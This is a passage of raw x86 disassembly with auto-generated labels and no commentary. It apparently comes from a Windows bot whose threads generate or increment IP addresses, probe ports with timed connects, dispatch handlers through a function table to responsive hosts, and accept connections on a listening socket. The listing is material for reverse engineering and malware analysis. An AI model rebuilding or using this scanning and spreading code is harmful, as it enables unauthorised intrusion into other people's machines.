push ebx ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4079EF: ; CODE XREF: sub_407516+4C4�j
push 3E8h ; dwMilliseconds
call Sleep ; Sleep
push esi ; LPVOID
loc_4079FB: ; CODE XREF: sub_407516+123�j
call sub_407516
pop edi
pop esi
pop ebx
leave
retn 4
sub_407516 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407A07(SOCKET s, int, int)
sub_407A07 proc near ; CODE XREF: sub_40FCA3+5EA1�p
var_400 = byte ptr -400h
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push 42B9D8h
push eax
xor ebx, ebx
call sub_41795B
cmp dword ptr unk_42B620, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_407A75
push esi
mov esi, 42B628h
loc_407A3A: ; CODE XREF: sub_407A07+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push 42B9CCh
push eax
call sub_41795B
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_419440
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_407A3A
pop esi
loc_407A75: ; CODE XREF: sub_407A07+2B�j
push dword ptr byte_445EDC+0D403Ch
call sub_40C21E
push eax
push ebx
lea eax, [ebp+var_400]
push 42B9B8h
push eax
call sub_41795B
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_419440
push 0 ; int
lea eax, [ebp+var_200]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_200]
push eax
call sub_40CB08
add esp, 38h
pop edi
pop ebx
leave
retn
sub_407A07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407AD1(SOCKET s, int, int, int)
sub_407AD1 proc near ; CODE XREF: sub_40FCA3+580E�p
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_417661
test eax, eax
pop ecx
jle short loc_407B0D
mov eax, [ebp+arg_C]
push dword ptr in.S_un[eax*8] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_200]
push 42BA3Ch
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_407B20
; ---------------------------------------------------------------------------
loc_407B0D: ; CODE XREF: sub_407AD1+13�j
lea eax, [ebp+var_200]
push 42BA0Ch
push eax
call sub_41795B
pop ecx
pop ecx
loc_407B20: ; CODE XREF: sub_407AD1+3A�j
push 0 ; int
lea eax, [ebp+var_200]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_200]
push eax
call sub_40CB08
add esp, 18h
leave
retn
sub_407AD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407B48(int, int, int, int, char, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, char, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, int, SOCKET s, int, int, int, int, int, int, int, int, int, int, int)
sub_407B48 proc near ; CODE XREF: sub_4082D7+4F�p
var_204 = byte ptr -204h
ThreadId = dword ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
s = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
cmp [ebp+arg_130], 0FFFFFFFFh
push ebx
push esi
jz loc_407F3E
mov eax, [ebp+arg_130]
xor ebx, ebx
shl eax, 6
push edi
cmp [eax+42B62Ch], ebx
jz loc_407C9F
push 4
call sub_417661
test eax, eax
pop ecx
jnz loc_407C9F
mov eax, dword ptr unk_4315A4
mov esi, 444374h
push 104h
push esi
push ebx
mov dword ptr unk_444584, eax
mov dword ptr unk_444580, ebx
call dword ptr byte_424084+4
push 103h
mov edi, 444478h
push 431644h
push edi
call sub_419300
mov eax, [ebp+s]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword ptr unk_444370, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword ptr unk_444608, eax
jnz short loc_407BFC
lea eax, [ebp+arg_10]
push eax
push 444588h
call sub_419300
mov dword ptr unk_44460C, 1
jmp short loc_407C13
; ---------------------------------------------------------------------------
loc_407BFC: ; CODE XREF: sub_407B48+98�j
lea eax, [ebp+arg_90]
push eax
push 444588h
call sub_419300
mov dword ptr unk_44460C, ebx
loc_407C13: ; CODE XREF: sub_407B48+B2�j
add esp, 0Ch
lea eax, [ebp+var_204]
push edi
push esi
push dword ptr unk_444584
push 42BBD8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_41741F
add esp, 20h
mov dword ptr unk_44457C, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push offset unk_444370 ; lpParameter
push offset sub_407516 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, dword ptr unk_44457C
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz loc_407D4E
call GetLastError
push eax
lea eax, [ebp+var_204]
push 42BB98h
push eax
call sub_41795B
add esp, 0Ch
loc_407C92: ; CODE XREF: sub_407B48+20E�j
lea eax, [ebp+var_204]
push eax
call sub_40CB08
pop ecx
loc_407C9F: ; CODE XREF: sub_407B48+2A�j
; sub_407B48+3A�j
mov eax, [ebp+arg_130]
shl eax, 6
cmp [eax+42B630h], ebx
jz loc_407DFE
push 5
call sub_417661
test eax, eax
pop ecx
jnz loc_407DFE
push ebx
call sub_419597
push eax
call sub_4179AD
mov eax, dword_4410C0
pop ecx
pop ecx
mov edi, 44461Ch
push 104h
push edi
push ebx
mov dword ptr unk_44482C, eax
mov dword ptr unk_444828, ebx
call dword ptr byte_424084+4
push 103h
mov esi, 444720h
push 431644h
push esi
call sub_419300
mov eax, [ebp+s]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword ptr unk_444618, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword ptr unk_4448B0, eax
jnz short loc_407D5B
lea eax, [ebp+arg_10]
push eax
push 444830h
call sub_419300
mov dword ptr unk_4448B4, 1
jmp short loc_407D72
; ---------------------------------------------------------------------------
loc_407D46: ; CODE XREF: sub_407B48+20C�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_407D4E: ; CODE XREF: sub_407B48+129�j
cmp dword ptr unk_444610, ebx
jz short loc_407D46
jmp loc_407C92
; ---------------------------------------------------------------------------
loc_407D5B: ; CODE XREF: sub_407B48+1E2�j
lea eax, [ebp+arg_90]
push eax
push 444830h
call sub_419300
mov dword ptr unk_4448B4, ebx
loc_407D72: ; CODE XREF: sub_407B48+1FC�j
add esp, 0Ch
lea eax, [ebp+var_204]
push esi
push edi
push dword ptr unk_44482C
push 42BB48h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_41741F
add esp, 20h
mov dword ptr unk_444824, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push offset unk_444618 ; lpParameter
push offset sub_405D1B ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, dword ptr unk_444824
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz loc_407EF7
call GetLastError
push eax
lea eax, [ebp+var_204]
push 42BB04h
push eax
call sub_41795B
add esp, 0Ch
loc_407DF1: ; CODE XREF: sub_407B48+3B7�j
lea eax, [ebp+var_204]
push eax
call sub_40CB08
pop ecx
loc_407DFE: ; CODE XREF: sub_407B48+166�j
; sub_407B48+176�j
mov eax, [ebp+arg_130]
pop edi
shl eax, 6
cmp [eax+42B634h], ebx
jz loc_407F3E
push 3
call sub_417661
test eax, eax
pop ecx
jnz loc_407F3E
mov esi, 444234h
push 104h
push esi
push ebx
call dword ptr byte_424084+4
push 5Ch
push esi
call sub_419570
pop ecx
cmp eax, ebx
pop ecx
jz short loc_407E46
mov [eax], bl
loc_407E46: ; CODE XREF: sub_407B48+2FA�j
mov eax, dword ptr unk_4315A8
mov dword ptr unk_44434C, ebx
mov dword ptr unk_444338, eax
lea eax, [ebp+arg_10]
push eax
push 443FACh
call sub_41795B
mov eax, [ebp+s]
pop ecx
pop ecx
mov dword ptr unk_443FA8, eax
mov ecx, [ebp+arg_138]
push esi
push dword ptr unk_444338
mov dword ptr unk_444344, ecx
mov ecx, [ebp+arg_13C]
push eax ; s
mov dword ptr unk_444348, ecx
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_204]
push 42BAB8h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_41741F
add esp, 20h
mov dword ptr unk_444340, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push offset unk_443FA8 ; lpParameter
push offset sub_406428 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, dword ptr unk_444340
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jz short loc_407F16
jmp short loc_407F0C
; ---------------------------------------------------------------------------
loc_407EEF: ; CODE XREF: sub_407B48+3B5�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_407EF7: ; CODE XREF: sub_407B48+288�j
cmp dword ptr unk_4448B8, ebx
jz short loc_407EEF
jmp loc_407DF1
; ---------------------------------------------------------------------------
loc_407F04: ; CODE XREF: sub_407B48+3CA�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_407F0C: ; CODE XREF: sub_407B48+3A5�j
cmp dword ptr unk_444354, ebx
jz short loc_407F04
jmp short loc_407F31
; ---------------------------------------------------------------------------
loc_407F16: ; CODE XREF: sub_407B48+3A3�j
call GetLastError
push eax
lea eax, [ebp+var_204]
push 42BA70h
push eax
call sub_41795B
add esp, 0Ch
loc_407F31: ; CODE XREF: sub_407B48+3CC�j
lea eax, [ebp+var_204]
push eax
call sub_40CB08
pop ecx
loc_407F3E: ; CODE XREF: sub_407B48+12�j
; sub_407B48+2C6�j ...
pop esi
pop ebx
leave
retn
sub_407B48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407F42(u_long hostlong)
sub_407F42 proc near ; CODE XREF: sub_4080C3:loc_408125�p
hostlong = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+hostlong]
push esi
push 4
lea esi, ds:4410C8h[eax*8]
lea eax, [ebp+hostlong]
push esi
push eax
call sub_417A40
add esp, 0Ch
push [ebp+hostlong] ; hostlong
call htonl ; htonl
inc eax
push eax ; hostlong
mov [ebp+hostlong], eax
call htonl_0
mov [ebp+hostlong], eax
lea eax, [ebp+hostlong]
push 4
push eax
push esi
call sub_417A40
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_407F42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F8A proc near ; CODE XREF: sub_4080C3+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_4180D0
cmp eax, 0Fh
pop ecx
jbe short loc_407FB2
xor eax, eax
jmp short loc_408023
; ---------------------------------------------------------------------------
loc_407FB2: ; CODE XREF: sub_407F8A+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push 42BC28h
push [ebp+arg_0]
call sub_418ED7
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_407FDF
call sub_4179B7
mov [ebp+var_C], eax
loc_407FDF: ; CODE XREF: sub_407F8A+4B�j
cmp [ebp+var_8], esi
jnz short loc_407FEC
call sub_4179B7
mov [ebp+var_8], eax
loc_407FEC: ; CODE XREF: sub_407F8A+58�j
cmp [ebp+var_4], esi
jnz short loc_407FF9
call sub_4179B7
mov [ebp+var_4], eax
loc_407FF9: ; CODE XREF: sub_407F8A+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_408005
call sub_4179B7
loc_408005: ; CODE XREF: sub_407F8A+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword ptr in.S_un[ecx*8], eax
loc_408023: ; CODE XREF: sub_407F8A+26�j
pop esi
leave
retn
sub_407F8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408026(int, u_short hostshort, int)
sub_408026 proc near ; CODE XREF: sub_4080C3+A9�p
; sub_40E022+30�p
writefds = fd_set ptr -120h
name = sockaddr ptr -1Ch
timeout = timeval ptr -0Ch
argp = dword ptr -4
arg_0 = dword ptr 8
hostshort = word ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
inc edi
push ebx ; protocol
push edi ; type
push 2 ; af
mov [ebp+argp], edi
call socket_0
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40804F
xor eax, eax
jmp short loc_4080BE
; ---------------------------------------------------------------------------
loc_40804F: ; CODE XREF: sub_408026+23�j
mov eax, [ebp+arg_0]
push dword ptr [ebp+hostshort] ; hostshort
mov [ebp+name.sa_family], 2
mov dword ptr [ebp+name.sa_data+2], eax
call htons_2
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push esi ; s
call ioctlsocket_0
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect_0
mov eax, [ebp+arg_8]
mov [ebp+timeout.tv_usec], ebx
mov [ebp+timeout.tv_sec], eax
lea eax, [ebp+timeout]
push eax ; timeout
lea eax, [ebp+writefds]
push ebx ; exceptfds
push eax ; writefds
push ebx ; readfds
push ebx ; nfds
mov [ebp+writefds.fd_array], esi
mov [ebp+writefds.fd_count], edi
call select_0
push esi ; s
mov edi, eax
call closesocket_0
xor eax, eax
cmp edi, ebx
setnle al
loc_4080BE: ; CODE XREF: sub_408026+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_408026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4080C3(LPVOID)
sub_4080C3 proc near ; DATA XREF: sub_4082D7+13B�o
var_29C = dword ptr -29Ch
CriticalSection = _RTL_CRITICAL_SECTION ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = dword ptr -0C0h
s = dword ptr -40h
hostshort = word ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
mov ebx, esi
pop ecx
imul ebx, 234h
jmp loc_4082B4
; ---------------------------------------------------------------------------
loc_40810F: ; CODE XREF: sub_4080C3+1FF�j
cmp [ebp+var_10], 0
push eax ; hostlong
jz short loc_408125
lea eax, [ebp+var_150]
push eax
call sub_407F8A
pop ecx
jmp short loc_40812A
; ---------------------------------------------------------------------------
loc_408125: ; CODE XREF: sub_4080C3+51�j
call sub_407F42
loc_40812A: ; CODE XREF: sub_4080C3+60�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword ptr [ebx+44B86Ch]
push dword ptr [ebp+hostshort]
push edi ; in
call inet_ntoa_0
push eax
lea eax, [ebp+CriticalSection]
push 42BC70h
push eax
call sub_41795B
lea eax, [ebp+CriticalSection]
push eax
lea eax, [ebx+44B668h]
push eax
call sub_41795B
push [ebp+var_38] ; int
push dword ptr [ebp+hostshort] ; hostshort
push edi ; int
call sub_408026
add esp, 2Ch
cmp eax, 1
jnz loc_4082A9
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4081FE
push offset CriticalSection ; lpCriticalSection
call EnterCriticalSection
push dword ptr [ebp+hostshort]
push edi ; in
call inet_ntoa_0
push eax
lea eax, [ebp+CriticalSection]
push 42BC34h
push eax
call sub_41795B
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4081E0
cmp byte ptr [ebp+var_C0], 0
push 1 ; int
push [ebp+var_18] ; int
lea eax, [ebp+CriticalSection]
push eax ; int
lea eax, [ebp+var_C0]
jnz short loc_4081D4
lea eax, [ebp+var_140]
loc_4081D4: ; CODE XREF: sub_4080C3+109�j
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4081E0: ; CODE XREF: sub_4080C3+EE�j
lea eax, [ebp+CriticalSection]
push eax ; lpCriticalSection
call sub_40CB08
mov [esp+29Ch+var_29C], 444358h
call LeaveCriticalSection
jmp loc_4082A9
; ---------------------------------------------------------------------------
loc_4081FE: ; CODE XREF: sub_4080C3+BE�j
push edi ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_208]
push eax
call sub_41795B
mov eax, [ebp+var_20]
shl eax, 6
add eax, 42B5F8h
push eax
lea eax, [ebp+var_178]
push eax
call sub_41795B
add esp, 10h
cmp byte ptr [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_408242
lea eax, [ebp+var_140]
loc_408242: ; CODE XREF: sub_4080C3+177�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_41795B
mov eax, [ebp+s]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, dword ptr [ebp+hostshort]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call dword ptr [eax+42B624h]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_4082A9: ; CODE XREF: sub_4080C3+B4�j
; sub_4080C3+136�j
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
loc_4082B4: ; CODE XREF: sub_4080C3+47�j
mov eax, [ebx+44B86Ch]
cmp dword ptr unk_4410CC[eax*8], 0
jnz loc_40810F
push esi
call sub_417735
pop ecx
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_4080C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_4082D7(LPVOID)
sub_4082D7 proc near ; DATA XREF: sub_40FCA3+33D2�o
; sub_40FCA3+53C6�o
var_1DC = dword ptr -1DCh
dwMilliseconds = dword ptr -1CCh
Parameter = byte ptr -14Ch
var_13C = dword ptr -13Ch
s = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+Parameter]
inc ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+Parameter]
push eax ; cp
call inet_addr_0
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+Parameter]
push 53h
mov dword ptr in.S_un[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_407B48
push 8
call sub_417661
add esp, 150h
cmp eax, ebx
jnz short loc_4083A5
mov esi, offset CriticalSection
push esi ; lpCriticalSection
call DeleteCriticalSection
push 80000400h ; dwSpinCount
push esi ; lpCriticalSection
call InitializeCriticalSectionAndSpinCount ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4083A5
lea eax, [ebp+dwMilliseconds]
push 42BDB0h
push eax
call sub_41795B
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40838F
push ebx ; int
lea eax, [ebp+dwMilliseconds]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40838F: ; CODE XREF: sub_4082D7+99�j
lea eax, [ebp+dwMilliseconds]
push eax
call sub_40CB08
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4083A5: ; CODE XREF: sub_4082D7+63�j
; sub_4082D7+7F�j
mov eax, [ebp+var_2C]
mov esi, Sleep
mov edi, ebx
mov dword ptr unk_4410CC[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_408467
loc_4083C3: ; CODE XREF: sub_4082D7+18A�j
push edi
lea eax, [ebp+Parameter]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+dwMilliseconds]
push 42BD68h
push eax
call sub_41795B
push ebx
lea eax, [ebp+dwMilliseconds]
push 8
push eax
call sub_41741F
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov [eax+44B86Ch], ecx
lea eax, [ebp+Parameter]
push ebx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_4080C3 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_40847E
call GetLastError
push eax
lea eax, [ebp+dwMilliseconds]
push 42BD18h
push eax
call sub_41795B
lea eax, [ebp+dwMilliseconds]
push eax
call sub_40CB08
add esp, 10h
loc_408459: ; CODE XREF: sub_4082D7+1AC�j
push 1Eh ; dwMilliseconds
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_4083C3
loc_408467: ; CODE XREF: sub_4082D7+E6�j
cmp [ebp+var_30], ebx
jz short loc_40848C
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax ; dwMilliseconds
call esi ; Sleep
jmp short loc_408499
; ---------------------------------------------------------------------------
loc_40847A: ; CODE XREF: sub_4082D7+1AA�j
push 1Eh ; dwMilliseconds
call esi ; Sleep
loc_40847E: ; CODE XREF: sub_4082D7+159�j
cmp [ebp+var_4], ebx
jz short loc_40847A
jmp short loc_408459
; ---------------------------------------------------------------------------
loc_408485: ; CODE XREF: sub_4082D7+1C0�j
push 7D0h ; dwMilliseconds
call esi ; Sleep
loc_40848C: ; CODE XREF: sub_4082D7+193�j
mov eax, [ebp+var_2C]
cmp dword ptr unk_4410CC[eax*8], 1
jz short loc_408485
loc_408499: ; CODE XREF: sub_4082D7+1A1�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword ptr in.S_un[eax*8]
push eax ; in
call inet_ntoa_0
push eax
lea eax, [ebp+dwMilliseconds]
push 42BCC0h
push eax
call sub_41795B
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_4084E7
push ebx ; int
lea eax, [ebp+dwMilliseconds]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_13C]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4084E7: ; CODE XREF: sub_4082D7+1F1�j
lea eax, [ebp+dwMilliseconds]
push eax ; dwMilliseconds
call sub_40CB08
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword ptr unk_4410CC[eax*8], ebx
call esi ; Sleep
push 8
call sub_417661
cmp eax, 1
pop ecx
jnz short loc_40851E
push offset CriticalSection ; lpCriticalSection
call DeleteCriticalSection
loc_40851E: ; CODE XREF: sub_4082D7+23A�j
push [ebp+var_2C]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_4082D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40852E(LPVOID)
sub_40852E proc near ; DATA XREF: sub_40FCA3+37BB�o
var_350 = byte ptr -350h
Parameter = byte ptr -150h
var_14C = dword ptr -14Ch
hostshort = word ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
addr = sockaddr ptr -28h
ThreadId = dword ptr -18h
name = sockaddr ptr -14h
addrlen = dword ptr -4
s = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+s]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+Parameter]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
push 6 ; protocol
push 1 ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], esi
mov [ebp+addrlen], edi
call socket_0
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_408699
mov ecx, [ebp+var_40]
push 1 ; lEvent
imul ecx, 234h
push 401h ; wMsg
push esi ; hWnd
push eax ; s
mov [ecx+44B874h], eax
call WSAAsyncSelect ; WSAAsyncSelect
lea eax, [ebp+name]
push edi ; namelen
push eax ; name
push [ebp+s] ; s
call bind_0
test eax, eax
jnz loc_408699
push 0Ah ; backlog
push [ebp+s] ; s
call listen_0
test eax, eax
jnz loc_408699
loc_4085DE: ; CODE XREF: sub_40852E+C6�j
; sub_40852E+166�j
lea eax, [ebp+addrlen]
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push [ebp+s] ; s
call accept_0
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4085DE
movzx eax, word ptr [ebp+addr.sa_data]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push dword ptr [ebp+addr.sa_data+2] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_350]
push 42BE48h
push eax
call sub_41795B
push edi
lea eax, [ebp+var_350]
push 12h
push eax
call sub_41741F
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov [eax+44B86Ch], ecx
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push esi ; dwCreationFlags
push eax ; lpParameter
push offset sub_4086BE ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov [ecx+44B87Ch], eax
jnz short loc_40868F
call GetLastError
push eax
push 42BDF8h
call sub_40CB7C
pop ecx
pop ecx
jmp short loc_40869C
; ---------------------------------------------------------------------------
loc_408687: ; CODE XREF: sub_40852E+164�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_40868F: ; CODE XREF: sub_40852E+142�j
cmp [ebp+var_30], esi
jz short loc_408687
jmp loc_4085DE
; ---------------------------------------------------------------------------
loc_408699: ; CODE XREF: sub_40852E+63�j
; sub_40852E+97�j ...
mov edi, [ebp+s]
loc_40869C: ; CODE XREF: sub_40852E+157�j
push edi ; s
call closesocket_0
push [ebp+s] ; s
call closesocket_0
push [ebp+var_40]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_40852E endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4086BE(LPVOID)
sub_4086BE proc near ; DATA XREF: sub_40852E+124�o
buf = byte ptr -1344h
var_344 = byte ptr -344h
Parameter = byte ptr -144h
name = byte ptr -13Ch
hostshort = word ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
ThreadId = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
in = in_addr ptr -14h
addr = byte ptr -8
var_4 = dword ptr -4
s = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_417F30
mov eax, [ebp+s]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
